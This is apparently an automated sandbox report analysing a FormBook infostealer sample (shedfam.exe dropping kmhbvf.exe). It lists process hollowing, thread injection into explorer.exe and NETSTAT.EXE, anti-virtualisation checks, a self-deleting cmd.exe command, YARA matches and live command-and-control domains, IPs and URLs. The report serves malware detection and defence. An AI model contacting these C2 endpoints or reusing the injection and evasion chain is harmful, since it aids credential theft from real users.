Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EFA354 SetUnhandledExceptionFilter, 1_2_00EFA354
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 2_2_00EFA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 2_2_00EFA385

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 18.167.242.213 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 103.100.63.146 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.111lll.xyz
Source: C:\Windows\explorer.exe Domain query: www.73129.vip
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Section loaded: unknown target: C:\Users\user\AppData\Local\Temp\kmhbvf.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Section loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 120000 Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Thread register set: target process: 3452 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Thread register set: target process: 3452 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Thread register set: target process: 3452 Jump to behavior
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F31AC6 SendInput,keybd_event, 1_2_00F31AC6
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Process created: C:\Users\user\AppData\Local\Temp\kmhbvf.exe C:\Users\user\AppData\Local\Temp\kmhbvf.exe" "C:\Users\user\AppData\Local\Temp\wenvaisrl.au3 Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\kmhbvf.exe" Jump to behavior
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F29369 LogonUserW, 1_2_00F29369
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EE5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 1_2_00EE5240
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F351E2 mouse_event, 1_2_00F351E2
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F34F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 1_2_00F34F1C
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F288CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 1_2_00F288CD
Source: shedfam.exe, 00000000.00000002.258371717.00000000029FF000.00000004.00000800.00020000.00000000.sdmp, kmhbvf.exe, 00000001.00000000.244367658.0000000000F86000.00000002.00000001.01000000.00000004.sdmp, kmhbvf.exe, 00000002.00000000.249911083.0000000000F86000.00000002.00000001.01000000.00000004.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program ManagerT7<=ge
Source: kmhbvf.exe, explorer.exe, 00000003.00000000.303545502.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.271730124.00000000090D8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.299459459.0000000006770000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000003.00000000.257495266.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.321537541.0000000001378000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CProgmanile
Source: explorer.exe, 00000003.00000000.321880646.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.294317706.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.258322035.0000000001980000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00EF885B cpuid 1_2_00EF885B
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F10030 GetLocalTime,__swprintf, 1_2_00F10030
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F0416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 1_2_00F0416A
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F10722 GetUserNameW, 1_2_00F10722
Source: C:\Users\user\Desktop\shedfam.exe Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 0_2_0040324F

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
OS version to string mapping found (often used in BOTs)
Source: kmhbvf.exe Binary or memory string: WIN_81
Source: kmhbvf.exe Binary or memory string: WIN_XP
Source: kmhbvf.exe Binary or memory string: WIN_XPe
Source: kmhbvf.exe Binary or memory string: WIN_VISTA
Source: kmhbvf.exe Binary or memory string: WIN_7
Source: kmhbvf.exe Binary or memory string: WIN_8
Source: kmhbvf.exe.0.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.0.kmhbvf.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.kmhbvf.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.kmhbvf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.515105095.0000000002E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361815335.0000000000C70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.515351865.0000000002F10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361658894.0000000000C40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.251703956.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.256639273.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.511329995.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.361161902.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.309944418.00000000103B2000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F4696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 1_2_00F4696E
Source: C:\Users\user\AppData\Local\Temp\kmhbvf.exe Code function: 1_2_00F46E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 1_2_00F46E32
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756041 Sample: shedfam.exe Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 34 www.autonomaat.com 2->34 50 Malicious sample detected (through community Yara rule) 2->50 52 Yara detected FormBook 2->52 54 C2 URLs / IPs found in malware configuration 2->54 56 Modifies the prolog of user mode functions (user mode inline hooks) 2->56 12 shedfam.exe 20 2->12         started        signatures3 process4 file5 32 C:\Users\user\AppData\Local\Temp\kmhbvf.exe, PE32 12->32 dropped 15 kmhbvf.exe 12->15         started        process6 signatures7 70 Machine Learning detection for dropped file 15->70 72 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 15->72 74 Maps a DLL or memory area into another process 15->74 76 Tries to detect virtualization through RDTSC time measurements 15->76 18 kmhbvf.exe 15->18         started        process8 signatures9 42 Modifies the context of a thread in another process (thread injection) 18->42 44 Maps a DLL or memory area into another process 18->44 46 Sample uses process hollowing technique 18->46 48 Queues an APC in another process (thread injection) 18->48 21 explorer.exe 18->21 injected process10 dnsIp11 36 www.73129.vip 103.100.63.146, 49700, 80 YISUCLOUDLTD-AS-APYISUCLOUDLTDHK China 21->36 38 fbcuj92a.n.sktcks.com 18.167.242.213, 49699, 80 AMAZON-02US United States 21->38 40 2 other IPs or domains 21->40 58 System process connects to network (likely due to code injection or exploit) 21->58 60 Performs DNS queries to domains with low reputation 21->60 62 Uses netstat to query active network connections and open ports 21->62 25 NETSTAT.EXE 21->25         started        signatures12 process13 signatures14 64 Modifies the context of a thread in another process (thread injection) 25->64 66 Maps a DLL or memory area into another process 25->66 68 Tries to detect virtualization through RDTSC time measurements 25->68 28 cmd.exe 1 25->28         started        process15 process16 30 conhost.exe 28->30         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
18.167.242.213
 fbcuj92a.n.sktcks.com United States
16509 AMAZON-02US true
103.100.63.146
 www.73129.vip China
136970 YISUCLOUDLTD-AS-APYISUCLOUDLTDHK true

Contacted Domains

Name IP Active
fbcuj92a.n.sktcks.com 18.167.242.213 true
www.autonomaat.com 54.67.42.145 true
www.73129.vip 103.100.63.146 true
www.111lll.xyz unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.111lll.xyz/sk19/?6lu=u4lk2PnXcU0u2VBKyLJoTfxxVYVxHm+9jz8FSZNawyXEtvRDPmLLRjoruE33sVgH1sLP&u4=pVhTtd7pjTy true
  • Avira URL Cloud: safe
 unknown
www.justbeand.com/sk19/ true
  • Avira URL Cloud: safe
 low
http://www.73129.vip/sk19/?6lu=QEAmWZfTRhzoING4/pUtXBuIHlMFTiZNz3G0bLc7Fgt63bTZUMXUq+W3t0nrgTJvEVvm&u4=pVhTtd7pjTy true
  • Avira URL Cloud: safe
 unknown